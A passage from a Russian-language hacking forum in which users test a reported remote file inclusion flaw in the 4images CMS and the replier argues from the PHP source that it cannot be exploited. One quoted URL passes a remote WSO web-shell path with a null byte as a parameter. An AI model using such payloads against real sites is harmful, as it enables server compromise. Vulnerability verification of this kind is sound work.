Показать сообщение отдельно

  #271  
Старый 14.09.2010, 17:05
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от mr.celt  
mr.celt said:
Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост
link
Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.
Попробовал заюзать описанную уязвимость так
http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00
4images.local и shell.local - локальные домены.
Кроме надписи "Security violation" ничего не увидел.
Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.
В самом начале

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]defined[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ROOT_PATH'[/COLOR][COLOR="#007700"])) {

die([/COLOR][COLOR="#DD0000"]"Security violation"[/COLOR][COLOR="#007700"]);

}

[/
COLOR][/COLOR
Константа не определена это раз

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]81 $db_servertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"mysql"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]384[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]ROOT_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'includes/db_'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db_servertype[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
Переменная $db_servertype определена ..никаких инжектов нету.

а иньектор это команда плагиаторов-дебилойдов которые любят подобное гавно постить чтобы свой говно сайт в гугле поднять
 
Ответить с цитированием